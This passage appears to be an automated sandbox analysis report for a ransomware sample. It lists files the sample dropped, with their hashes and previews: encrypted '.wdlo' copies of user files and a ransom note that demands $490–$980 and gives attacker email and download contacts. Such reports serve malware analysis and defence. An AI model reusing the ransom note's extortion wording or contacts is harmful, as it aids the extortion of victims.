SHA-512:	FCAAA704524426B966A40D0FE674436F4AB2F5B039EBEEC1EDE2345153EF3147F127708A699339B1E0BA1431860D90941B8758CFC4D0B5F5C2E2E56D2A7B8C4B
Malicious:	false
Reputation:	unknown
Preview:	<?xmlHI.2}.JG7..\.....q.).q..c.N.xm...D<{..O.J?`....C..y....8p.ia.\|.....}@d`.o[.Vp!...p..e..T...a&....`.R...b.......+=.<....Z......V...C.. (k..N.CA...3.....- .x8N-f@.Jo..b..Zv2..F..H..DB2@.E&{T.....V..... ./^...#Y.v{....,.cr.9..C.s..~.j.9.I....1.V....W>.....K.... .Np\|.qB.."..\|....yim1l.U&...'..P.....j......<....evD..0..T..6...D....[/.P.pX..._u!.....D)..(.....g[o.`.7.;E....?.v..x.L}."..yZ,.j&..?M=;...A[\|0dR-.*..;.......X..G.....7& .0.P.v......'.)q..&.d>c.....Z.C......#.a...$..2.>J.c.`Sif...K..c.B.Y,V...gj.d.Rc.1.q.i_....@.".lq.q...5^.E..Y\..{!...`+v.....Y...^v J.......xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\OneDrive\Resources.pri.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	4750
Entropy (8bit):	7.961402099431523
Encrypted:	false
SSDEEP:	96:WQ+TFKFRZNMdy1oSUta5/8PTrHYQQSYyEc4rfgnJPq5Jbaa12+3:WQaKZNMdy1o+IH4Q8gnJi5tl
MD5:	4C7B8422B130399AA2F35CC29BAC8B47
SHA1:	BA281F7B9E5D9BE473AF4458A16B38CD34B57280
SHA-256:	11CD03F3AC4A61AB03C5F28FFDD4D4C88FB184341D4781FB3E132EBE02A91D0A
SHA-512:	670DB10C459B57436B659BEA8A5B5349037B0D30488DF738388F457CF22287B25211188F4192C607E4315C102AAA7A6A561AFF5A41E6092A32192216C4003A28
Malicious:	false
Reputation:	unknown
Preview:	mrm_p7Q\|...T[.i...Riqy..nH.L..O.b50.......w.I....U6v.PiG.`SX#,....q..X.n.R...,......b..`...J.6.8 ....l..3T..8g.j....7;.......D,Rq.x.2..:.a...S.<(!.h.XPvD..j<..8...f.n#H.#V`.z..\$a. ....F..-....-.(t.e...&[.Y....%.0b.L..<.j.?xX._.&tY.v8.3V..;.5..D..W`>#.sfQ...C.^FQ.......toy...t?o...W.\7.BE..[RA.....''..4.......N.."'WX.Z...K.V.TT...:.B.).2...z...d..U...r<t}..'...n"...Kk]`.WA=.....b.#.A#y/........."....l......k.F.b.~.t"e.tu..oz...U..$t..+.W.Qzx(.@..M..i>E.....c..I...x...ml.fM.p.O.....&.'7=.vu.N....>k.<.=...3}...3.z4..g..>.R.A.A..p.?i...z.!U<l..3a.....YC.....2.,.P,._.....M..........4...c.7......2.....NA...{....[.W).\|._...l.i$C.A<...s.k...L....Q.1.2..xoo..Z...&B.c]5e).....5%....x...{..b.Vn(._.d3?...7...$.~.E....."B.@......zE...cq...a.k......A..f8..(......:..=....h.ky.u.L.Fb...U._.k.?..t...I3b..?Y!w....#.....<J..~........;..=..;j.X.... .yz..33.Ab..S}......;R..%M.\|.t^[.B..C.<]G;.!.wt.F...{....x.7.............R!#\|.w<...(..5.,&.N....%.......Bi>.

C:\Users\user\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1318
Entropy (8bit):	7.84630126656684
Encrypted:	false
SSDEEP:	24:YPcNNkLVs79cedmpb2Orn2Szoaxs0ANGSsGvEsZbtNA6zo9mQusWFbD:YPEGs7Xl6Ri0bHDsJzA6zRsWVD
MD5:	79309DA21345A679F9D1212B65492348
SHA1:	02ED06F88FB92D0178AB4C12CFF70972860E620E
SHA-256:	BD774FF7759856638C959A8C7741257CF10FDAA28DDD0FE35A261A2390CD2E08
SHA-512:	6E818F41AAC7E397DC9D69250047BFE7B0EC0A9DD3B3F71E06985C666898C780E3B855D00EFC426DC6B0BCD518D0569063D87FB746184F473A16D5EB08C857A2
Malicious:	false
Reputation:	unknown
Preview:	{"Recj..P.....oI...\....)...G..I...7.Q.4..._-fsU....@.9Sb..._...M.....7"N.Yyp..?.2T.".t.rR#+UG....."..s......T...tY.....u.....1...c9.2+.A..D.0c..C.r...Lb'J..{...t(y2...K. s#S ..t.9Y&x...@.S.?....O.X........<:....0.SK.+W&V....M...^..."U.0...[.{YTG'..:hW..-..`.]...X......Y?...G..&e......2F...Z..6..2...i.='.k.=...........dB.J+&#...ku...A.(...`.N...t7..1._.P...z.E.xr..Mu"....?..:[\?..-4...Cl=.ersk...S.....s{v....b.4f.Jb....L....k..l..g.-........_....r..~..b..b.j....o..i.a.<..}../.....8....X?..d....[1........`.aly;......\~.X0...N1.......?9y.E)U6R?!....0.`..'.........5Q...k..$-.g.....(.H..........*.M...wXo.[%P.9.].5.I!...Q...h..i..c..%b..m..d_.x..jM.......e.oO.f.....~.iY.......e._U.w/...W.....(]_...$.0..#^.8..+.`.7F`..@.]..=\|.U2.p..:...<.N$.....-...........J....96............/..&.Y..CO']...=.<....e....^Z.HI..74O2L....h.%.N#.j.....=.x.#...tu]...\jV....K.....D...>...L..@..zg......ry..Z.%Q.t.E...~...H^..&...M$Uc{.W`..5.r.&_....5gt......U

C:\Users\user\Local Settings\Temp\0mfrnngw.32d\unarchiver.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	378
Entropy (8bit):	7.361572204821195
Encrypted:	false
SSDEEP:	6:b1ht1rNPx/nAgpiHcxS7FVWB6eIvVht0fUBTQR2xRfuZ+6p7U6Dj6Z3cii96Z:59rHfmcg7FIU/VX0fUBUR2juZzpxDj6t
MD5:	A99E2FD75E29E5D7390A2449C098895A
SHA1:	5DFCA627CD09BD8934073CB831948815347BFFC1
SHA-256:	45453890D022733CE5E43BE2DD7D15C27B46C89E8D6381BEFB7A8A83C50D6006
SHA-512:	F4CCB9A3156BEDDBEC06F94449A3333FA93943B3CF8B39EA8F02BEBDD06B4D6D26ED1F41EE7A33D5A1590A3244AA3578DE59F026FB275DBEEAD52FBB9A5D45FE
Malicious:	false
Reputation:	unknown
Preview:	03/08...}M....q..\....H..*'.}.....{...9...4...P.LN.T....U.M;?."2R..~B...<.y..b.`.....[u...`8..........q.G..=...jF....Ov54....;xz.......w...V.o(. !c.w....+...'......G.>.....m.D._...}8Zd...YM.t..Ir.t....+C4...(O.1...`...LT...y...g..Y.....I.yBI..S.EE...,.^a.+....1.......B.....n..`U...+7.`@.+xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Temp\AdobeARM.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	4499
Entropy (8bit):	7.956615864081817
Encrypted:	false
SSDEEP:	96:oCHptntXtYnE1bXwkLiN8YdpPiAprJ6+KExLpkwtJ2BDiAORjYA:Lphn3Bwku7Hq4E+VLDtAt1SsA
MD5:	930F9563EF091D218FA27EB75DB2AE1D
SHA1:	EB5716D2A7E1478BE959E5BFBA2E1E82EC91D159
SHA-256:	DEBDFA2117B37B9437EB7203D71425279CDBE991F59396F18D99AAB300922CCE
SHA-512:	03EE5F7BE4396C01CC6D20334091FFA31253F0B84E90D744F4C96C9789E275EF6BA7C26BFD9E276C4AE4BA818140CC732481440C607F23453B00DBF4DE04F462
Malicious:	false
Reputation:	unknown
Preview:	[2020......2....KpP.k....6........7~s...M.m+v........Z.DgE.U..j.......7.\|..cJ..+..Ek.Q..}.H\.....j2?i(4......,.<n.nm;(?.H....m<......(H...3/P.O.h....i%9..a.Ed.t..s&..g...#..2..^...+....Y.\..,s..jB...E.lN.i..A.........v.....85./.....y\.7u..@K..G1H.(..(..?c...C'...i.<...=.V......3!K.U.J/.^...I.$..o..&S>.......Y.R....... ..rc..Y......._1{....I...N0....D.:.S{.1.+!.j+e.%.9$0B.Y.2.p.[.!..............X...p. ..T.CE.cTp.x.!W.. X Vi=..Jb.VC-N>...h...:......c..!j.O...1Oe.lvj.....@fM.=...7.}.*D.Z.i...c..Q.E........p#.AF... ..a.[-D'.l.[.U.WHz_..o..^...H.o.j........~.u7...z...&g.8.;.0v...\|.0.o...o0.......x+.z.;..680....;..m.R...H~Y@.p..C...Y....G..J.T.g.eGa.b..R=0.!^.m...+.jo...&...r.........r0B/..c~.}...d..c~.....d.]-Mr".co.g..........7.5.Sf\|c..x.b.{T ..s..b-..U...k..NLx.S.TJ.XK[.N....X...l..q_......A...kN.KBP#.e.3.8~..A.AL..'$.e...,z.B.nG...QfM.x!.....]..N.1..;\|.x.A.-.v.B.#.{.e....3..y.\|Q.7.c.v...1X....S..ye...w.l....wJ.@..E....F...*.L....

C:\Users\user\Local Settings\Temp\CR_14C6C.tmp\setup.exe.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2674494
Entropy (8bit):	6.684471502050741
Encrypted:	false
SSDEEP:	49152:4rbr/3R1lRf+yAHLvThf0we+9fPF0RkBOETd4r0:abbAHPFDp4I
MD5:	6DBCCC9F9334584558ACE2EF8F711996
SHA1:	482F063C85645DD44F409856E659FFEAF92A368A
SHA-256:	3BD2E4E6FB0A8E85C0FFDB29C46B8E17BD76F409629965FF6B9B7B335F687E25
SHA-512:	E87950D66FF2E150F29FA6946D95C459F1F9A20997CC927DA68F9D2A362D9327E3FAA4D16CEC431B746C31F7E0DF178B8D8F91D1BFCBBAEAA92A90BC49F5EB46
Malicious:	false
Reputation:	unknown
Preview:	MZx..P.fB}i.. ..(H..peF..r].md..Y.._]..ldyD.Eu\|O..... ..P.t..y.66...1.:,...Y.#E.J.j..u..m.0..2....G.<3.S'..{..y...J/.Jn=......0D.^.)c7.....Se...<..]G...X.{...d.l<..."..j..7&,v.cK.TU.Z.0QD\|....7.g....34.B.Bg..k.d>..lbw...9..^..9.O...s.H....Q....(x.E..G....<...[.L.b D.0...B.......J.&.V...4...g.,]E...V.I.._5k^/<.l...M..H.....>}.O.S.C.u..M..j.4.ol.wK...m.pB?.....>.\..5.......4n.V....w....Q.UW.(.x...?RT...eM....c[...9.@......%...j..[.6KQ.M".S..3.....>.\|p.l.....J.JI....>.o.z.il.....l.?..>>..,#:5....w.H..$.$.g.{......K.^....PKW.{.c\.#m.*\E....(....5].d.i.O....;m........ar.{.kT.......U"....O.yj.....U>.Zl.A..[Z...........7.1..A....r.wjW..h!..[.w....7..~.Z1@j..za%.../......bz.R.F/..mj7...\3>i..9oG......}........Z6..F....BB..Q.n.\...k..nf.Y0............:...a0.z.....>.L...[.M....g.S[T#.Ey.._.....8Xv.O.1..NJ.n...S.e.....}.i.&.q.DC......\|h..>.w.=w.z..Zr....x...q&7.....NS...y...$..#.7m..Y..P..@..N..b7 ..].b..1...PF..;.=..u5.S[.l..\yu..../..m.W].....@.

C:\Users\user\Local Settings\Temp\JavaDeployReg.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	423
Entropy (8bit):	7.408853386462209
Encrypted:	false
SSDEEP:	12:oYK64gvK8hD9Alxkb6z3/7hjsWvhenydV6Dj6Z3cii9a:oYOrjlz3jlkydOWFbD
MD5:	9ABA2EDDB6E7AC571FE42B63E6DA704E
SHA1:	00109969792F485CC1591C734468EB3DBCBB4357
SHA-256:	09DFAB3228465567630D189316C4BACD55ABF48E27F353DD0EE2481789569A51
SHA-512:	31F7D109E70AB1FDAFCAA44BD85CB42EC2BC6BE9A61F4F58E3435ECC7081F5BD8E341377CA575EA81E12966EF727FCB60752F139E69557B6D557989AE1F7CDAD
Malicious:	false
Reputation:	unknown
Preview:	[20206.A.U..q2j....<..y..N.....D.P.)Mi?l7.."U.'.w......osH'...d.b....gI..7x...4........L.%......s.....p.2....4.):.Y.y...5.....2...iH.'F.......r.1.}..fZx..u..`.1...y.Z..=...U....U.9Js!.G...{...N...}.....]......3.R...<...&~.~.;..i..I..>/.....{...!.d..ba.hh.1..wr.(sS......~..pQ=z.=p.>..\-........wc5=....9.A...P.]...h.Z8u..y...BGl.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Temp\chrome_installer.log.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	21607
Entropy (8bit):	7.991879974940913
Encrypted:	true
SSDEEP:	384:bhVpTSYKTqzL3sMNiGHhLi/Ow2/1ok3BKHnfCbd73ukuQuHPJtIbPkBuWZDRkrI:NyqzDjNLHh2/zY1l3EnfGbmJ+IhQI
MD5:	2507042BB7E0F9A76D0C4AE1FBAB9513
SHA1:	8C59063C2DB72F8DC68F1BD322ED87D04B3A4848
SHA-256:	3AEB77C644B0953D32070A28AB9CABFCA6A2D776AB7F18C93D37A20B803A7FE0
SHA-512:	8EC15CA8472FCA2F6AADB0030EB8F71DE1EF1E3701F7DBC250D5D459137AD3987E186C8B66C58B51B6BD870E3BA575B866874523393D94D53BF8849462AC41B2
Malicious:	false
Reputation:	unknown
Preview:	[0930"......C..)l ...`...g(.z,.l}T..N}...:..OM.....).p>......#U.9...6.x..C...y..\"..5...O%t..G.)...(.w..hS.k..L.....'..'..I.G&h...V.... c`.....C1Xw.._O.p..e..9..}....Wa.;.T..+...c.[.;..'P.D...........?..<..j..A....m5...........t.xC0.!...:.G..;/`,..?....i+..Y....D...E_..3.\e...r?.../C\|^.(..+......>=...6.>[2.{E..6T..[8.a....\........?.H.u....{.l/=O...&.......h....dw.\|..o4...:.....`^..N.....G.....X...M..9...../.9\>..9......7z.,.N....vU.[m............j.x.$G.qm.'l.....S}.......j..p.PjI/..!;MS...K.[y.. M..}:G..z....k...B........`"....b...z.....7.3.K\|./.=,........6@g...&..R....k~...z6...g..~^.<G.8.:..M(....>g...$.AI...9.5Q...!Wz..gK...N...X...@..;k..:a.._..6+.p.....sf..r#..M....!.....w1.).....\s6/.o...{l,V2....J\:.k.v}.o.M_j...H..~.9036l^........lF...S..X..)..,...'.~...".GGZ..!zs..A9....s....x....Q@@*..a....L......2@.1...-9..'.n&..J...e&.K]Q.-&.e....j'.M..\.M...fi^\W..T).....r.k...,........B.(..Q....}.F.E.\|.....g..3...V]]X.s.....R`.j..G...u

C:\Users\user\Local Settings\Temporary Internet Files\Low\MSIMGSIZ.DAT.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	49454
Entropy (8bit):	7.995651698375661
Encrypted:	true
SSDEEP:	1536:tD68vUSC7ZiXUOmHX9q9Akq9vSk0MPxpeD:tjvUJ7ZiXswWSOy
MD5:	54046D322DA23CF4C8E7E71439B8D743
SHA1:	49F6776B10E390C60B11A0915989AD6E449EF112
SHA-256:	251743D2E75A977D450260227F9C3D5CBE0F3E4FD5DFE8C140B91190B25F39C8
SHA-512:	96C73A1DF56E4521939690EDA5CECF2CD08042A50B9063A39744A926F7B5FC01BD31084BF7679FB9C47DE811A9E0985F6291FD0A4B0EBF80D5A068E65B2EA147
Malicious:	false
Reputation:	unknown
Preview:	........C.O....b.90yx...c.."...k.k.B..2.;...E..^(@....F..[\9....=._..~..u....!..+.v..2...."B.&.9.Q..0.i...g.$m.......9........c..!.../.=<o..@...f.b5).0R.Bl:.F.......t....n..1.........\|.....5.x~9..8$...S........(.M.l2!..G...bm..#..?..........b..'_..m.u0.=3...cv$.?.,a.+.1./..ST^..............T.K.....x.i...'..ZY..d'T...X..7_)+\F.;.X..q...H.aM..w.Q......5.9.T.$....B.e.u~?p).3^...j..g.&v.$b.{p..=..I'.u.^-n...b1.w....Z....,+.....!E..At{eG.8.>.+>........\|.b-W.t0..I.3.z..!g8.i....%...]e..N6.N5.gT....Q4 .EN.k.R.v...j...h...2...i...t..^.\.b.R.....mkl4B.%H.T/.......M.l(.xE_S8.].p..f.o.-B...Cw.V~F..2.'G^...p[.F.........-.f.m...+.;..-.....\|s..."...(-.[2.D..Ne.Q.M-.(/.E.H@..;.rm.8....d$.(..w.@1...#Z...........D.%.2.iZOa.....LX...sb.y..x-.q...;...n0,c.%l.v$.D.}Z..^E.9...x..F..G~..9'...+.AV....4..5,..O&.mq.fls.Q.B]..R...vN..]w....`.EIj,.qz..H..R)....)..5..;b.t.!. %.s.. ...e..1r.5.....#.I.....6...t.Q...(......z.H....s~9.............%.3..b..Lq.. 2.....

C:\Users\user\Local Settings\Temporary Internet Files\Low\SmartScreenCache.dat.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	123350
Entropy (8bit):	7.998586189956862
Encrypted:	true
SSDEEP:	3072:i0l/ReBov1NdPRp60o6LNmJcxyYqmSwCCl35nBHcfhgSvSR:jZmw1zRZzx1S3Cl35+f8
MD5:	D9206E94EBDC57C9404FCE980ED7D4C9
SHA1:	3306BC1A9CF8D31401A44AF0F655EC2E4BCEB873
SHA-256:	E04C514694322CC1A82AEF2CC7514E6D0CEE46794972F3B923A0A129B9BB5F5F
SHA-512:	C032BD4BB542E50BD266AF55F36693FAE948C5E8B8BC09E7B2F74259A1BA39BEA17EF37557F2C316C8339859F214C0195FD0C473F1E508CF9D7A7A172432FBC1
Malicious:	false
Reputation:	unknown
Preview:	0.rJ.[.15...."....m...b..g%..4..~.%..u....Yc..?.8...o..../.M........$0T.......).D>.b.V.r.C8.\|(.\..Hk..}.."..xb.m..(V!...R...7.."u.:.b..m..\i}.. .N..lJ#.J...."A...,R.tE.Y........w.4..0.4n..x.{'^._.g.!~q....}X.....'..J..y.;...U....@....t.y.L.>..!..N.....K..B...h......<....A(H.ATU.j..A_S.\.BZ.i.V...M..4H..$..n......?.K..)..].wbgM...O,...ejE....r.K.u-...S..[.r.B......{T.+$e..0.Q..+9....i.6..J.Pl......t.g........53.N.w.]#..}....._)5e]KX...,g'.@1..ku.h.....V..r...AH..oU..0!"...}...B.^z...J.dr./..C.Dn.D.K.p..~...{.nJ....=.`Z.I.@.b~].q....Z.xrEL_n.u-.N6++.b.v...IN$`#.}y....iW..'.".O.sFF...&./...R.y...?:..6W..K..!.q.1...$y.....\|..>@..5...&.E..Q.n...\2S.......]..nq"..j..C...9..$..P.\|.'.w..cN?..d....y=.B...w......?...9..,.D....e&...c....%..IS.....W....:.e.....M.......U....../......i.uL...4....E.e.%H.1VV....i. ...../...o..d...A ..^....$.Q..f..o..6.v!@..8........d...-T&...d...+9T...x...d\.=".rf6..qnh56(..s12.qh`.R..)....0K%.#..T?..Y4L....nv..

C:\Users\user\Local Settings\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	804174
Entropy (8bit):	7.92939012496502
Encrypted:	false
SSDEEP:	24576:ubLRhKqz0oCGd4BxMIf9AXTXVJDZH+T7LT:uJsqz0oldMryZHYT
MD5:	179C7C60E471A992FA430262C6DD38CC
SHA1:	3F6250DFCC1571055796DBF727F2227A17061D4A
SHA-256:	DFF3EAE09EA1A9ADB1DB94F334B307F6541C542BEBB7A07D9F7FC71ABC0503D8
SHA-512:	4D21871EF36C7BEB8C799F154D68BF1F8B79436C0297CF28E952712134CD21FCBCB0C6762E9A969C70D0EA5FDB87AF25487CD0083369CA9878D72C73EB1637DA
Malicious:	true
Reputation:	unknown
Preview:	MZ...C..=).i..O=.tr....g...I..I80.......S.P.>...jP........Kt[......t.....S..t".....i...hs.i..M.\.K...~P!.V._x.....t^..k.....#.7.$Q.q..fpY..Dvx_..+.....d.m`.F.o...S....K+c&..(.Q1c..i3&.hG...=@6@.......................S..Rs.5....R.u.h.....Ds.]......e..* ..^.}... t.C.......\|E46-..}w..2e.U....x.Z.U".s$.H...P.h....qRD.V..5...........Ej~..h......2.V_#...iz.H.l.r...N,..w+a"L...>...\|O.P...>u....i....Qd.9..1..yM.\|P1q.7..6PZ....a.k.i....J..Mj....}.]...1....:..K..A.....M.M..g.7..qW.\...B..<]E.4...]....w.7.:M...aW..Iy....?KQ.R.oa{E.....aI.m...........s...2.i......1..F..BK.1...q...MP.++q..93....6..Z.pF....R..D..z.y..........f./A..+.J{..%u.t.t.!l.`.@:_.....y\|Z..W.Q...S..5.cGM.....5.K ......M.....x..@..n.O..S.uY.......4`..}.8m&....e'0^.Y.....A@.1...N...w...t.`..G.HG.{F.;..u.._^...u.Z..:_.is.QT_.:..W.t}c..4xx..,. ...V{...;Y......BK..Z..su.DK...`.....=i+.q.\|......-.....d....M.X....Q..^.....%...gB....-).0.\|..Y.......]..d2..<...K.t[.a..O..(...n...95..}...

C:\Users\user\Local Settings\bowsakkdestx.txt.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	896
Entropy (8bit):	7.742290410068317
Encrypted:	false
SSDEEP:	24:YB8W8edki7ufzP+seWdVeutimGEi5Tz+TWJYtoiuWFbD:YBgfP+seuVxtZGEUsW+toRWVD
MD5:	6F114F29F6F9B8EA408FBEA999F2D635
SHA1:	9D730D34E7A7066665FF018D9F6272EF5B5081FB
SHA-256:	E57A7A026F9CA006583BFB54D11F5249756E36944AEE28348E3837F2D82296D0
SHA-512:	5D459CB7B37ADF65017DD547A7D330DE909C94C33280E6D76BD1EF722E3392FF3970CB2CC8E27CCFBE8BCC2C2496556CD096DD286EBAB1FD16E1B7F28CF5861E
Malicious:	false
Reputation:	unknown
Preview:	{"pub.!D#~x..H$.f.....H...>..;\.S/@,....#.....,....r.E.j8......x....O...H.Q..b6XGcA.q.=;...3.....T}.p.q..;.^.PC...}o..^'.$..g.\.g.n.r.h}..z....P.b..b^.iu......6.K{......K....j.n,......\|B$u.......ji...?...m..;..p0P..m..j._.^.]LZ...X...v..,...K.u.q6o#..NAu..+9.k.D...g>..p].jd.y.P..m@....\|..-x..l.f......5_..,....g.......E..b..~R.F.#a......Ord."...].......Q.s.v.x...v...Tj.W....e.p+...........c3[.J b.H/..yf../.r334D.m..[.y.R:&ZK.P..}.`.e]..{......5.m..S>A4....S'.z.. .....%..\|.m..H._5.M....r>3...q.1.L%.EG.....La...x.I.k.z.z.....^3....}=.5fL_Ai.L1.LD.).PBN.u.Fi0....I...]f.gI[.....L6..g..v"4...%.2.e~d..Z..T..\..#...wT..[9..B.......?m.Cm6..9.....U.......!./...STv..<.0["eN.......V........&%.....=.a....&&.C....9$...) 9.z..i... .Q.+;..V.....;.0.w.......{...o....n..P.8..xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\SendTo\Bluetooth File Transfer.LNK.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1383
Entropy (8bit):	7.876179196228293
Encrypted:	false
SSDEEP:	24:kE6nZucUpYl/Yth3MVRui5M2Lfua+Am1YjLa490feLnbPky2YrWFbD:kHIcUYKj3M95pu1W249ceLnbPkyWVD
MD5:	907FD3530A72B4E777168CC56B59EAB3
SHA1:	0559A0FD7D7DD1EF7998E9A5AC906912C7E0809A
SHA-256:	2DE9F3D8D39FE1CA7CE77796F649B34364459228770DECC850ED66492D56B3EC
SHA-512:	BB30C539B00B3C91681D99ACD5009E7570B21379EEE6540E8F921F3CF95A20E727FBEE2229EC2C6FAED9F53846DF6B6BC82B2576561D4233E51C28BDFDD853E3
Malicious:	false
Reputation:	unknown
Preview:	L.....{.....f...0.pI?.x?`..X.....0...i........l=z.b..^..#.-..{....y.F..<i.(....6\|.?....h..6n.\..m.........JE..z.v...!#........p.t..\b=.?r.9./(..y0.....s...X..g..W'.(u...C.t.(F......?4b....-.3!.I.(T....Nb]..WR+........u)....U@.$...}.5..w%<wR.o...R..Ej.1..9.Q..W.t/.>.?.(.....@d..jq.......<......n.#z79.f.....E.\|.0....6.........1?..Pr.....o{]..Gn...>aZo..H.<.]....(.........}=P......KZ."...L\|.......J...m..8....5..nOU.2u.oYk.'T...../.Z9.Z.....N2.y..S....A...[!.[...&....2.4.q.A1..{.X./gDN!.'....qY..o.C..{..D6:?..[.9C.r.\~.c..W..c..%.....H.....0..fx.5....j9RF-........n.........k.B....b.%...:.........z.Y.;0.v.7[../.j........Q.F..o.].$l...@.......e$...q.Xg._.d!..G'..7.}..m?...8..Sc...7.(......... 0.......V.9.y...,R..Y...>.#7.R..l.a.p.(?9.]..ttY4..9...n.{...bT6.....N......).T~.t.'....}(C.w^.Gr\|.";Z..i.cl....9...6..5.E..h .9.m...Ee..0..e?.<.&.J.....L..@.(...E.....d..;y4.....~.8.\|.\$(_1r..X.^....8"...^i.t.......z.hA......VW..{K.R=\

C:\Users\user\SendTo\Desktop (create shortcut).DeskLink.wdlo (copy)

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	341
Entropy (8bit):	7.2794270405607735
Encrypted:	false
SSDEEP:	6:7+4YL5gAYevgsdel58q0XbWW/5q4tGuCXdZZdWgbc+K6Dj6Z3cii96Z:7+VL+3igb82ERCtdWpMDj6Z3cii9a
MD5:	1DCE9464548743991A2E48CA92649802
SHA1:	CEE0950701D2EA833507AC00CA89150230DF8D24
SHA-256:	7AA3E7ECF7B76B13DD23AB8198CC993CEB2915E9DD4238F70859393CC0E57A71
SHA-512:	BE0FD9123E6E6BC44E5B006138B24DDDBFE01CE995C3E628CFE3441E01C24B9154F528BCE75AA5222F9B2FC897A5C975192A7EAD069153D630EFBBC98CD01AE3
Malicious:	false
Reputation:	unknown
Preview:	deskt..>}.t..`...g._.....1.=..j..Ev=..!..p.f.........(....L...Rz.....o.w..c....:h.g......B......ly.=_+\.6!..L...%....q....Y6..a.FH.!i ..EZ.l...S.Dy..*.Gf@O..Z..Ld\|.b..k..M..j.^....=t.U5..,..y..9;.R\|6..G/.6.\.....O.vw..t..!.........0.8.<x:...f...Me...xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\_readme.txt

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1106
Entropy (8bit):	4.88766111046203
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWtfFmFRqrl3W4kA+GT/kF5M2/kAApJxFjWZ:WZHfv0p6WVFPFWrDGT0f/kjxWZ
MD5:	8EB779873B733C711EE02CB72DCE32E8
SHA1:	2AE8B4F774EFCB849FB17FD138709188FE3922E9
SHA-256:	A66B8028B17EF69D793C8DF346C62B8A7F91E4BDE4FBD2686509D13DF0EACA58
SHA-512:	3E3827EB52883821D20B5D45304A083C19F8CFC361EF6AAF7F425D53F215F5FC12BCE6F04E06340E1453E6CE71884B21C100C269C0ABC8565A358959186C0167
Malicious:	false
Reputation:	unknown
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-0S984cQ4B3..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@sysmail.ch....Reserve e-mail address to

C:\_readme.txt

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1106
Entropy (8bit):	4.88766111046203
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWtfFmFRqrl3W4kA+GT/kF5M2/kAApJxFjWZ:WZHfv0p6WVFPFWrDGT0f/kjxWZ
MD5:	8EB779873B733C711EE02CB72DCE32E8
SHA1:	2AE8B4F774EFCB849FB17FD138709188FE3922E9
SHA-256:	A66B8028B17EF69D793C8DF346C62B8A7F91E4BDE4FBD2686509D13DF0EACA58
SHA-512:	3E3827EB52883821D20B5D45304A083C19F8CFC361EF6AAF7F425D53F215F5FC12BCE6F04E06340E1453E6CE71884B21C100C269C0ABC8565A358959186C0167
Malicious:	true
Reputation:	unknown
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-0S984cQ4B3..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on 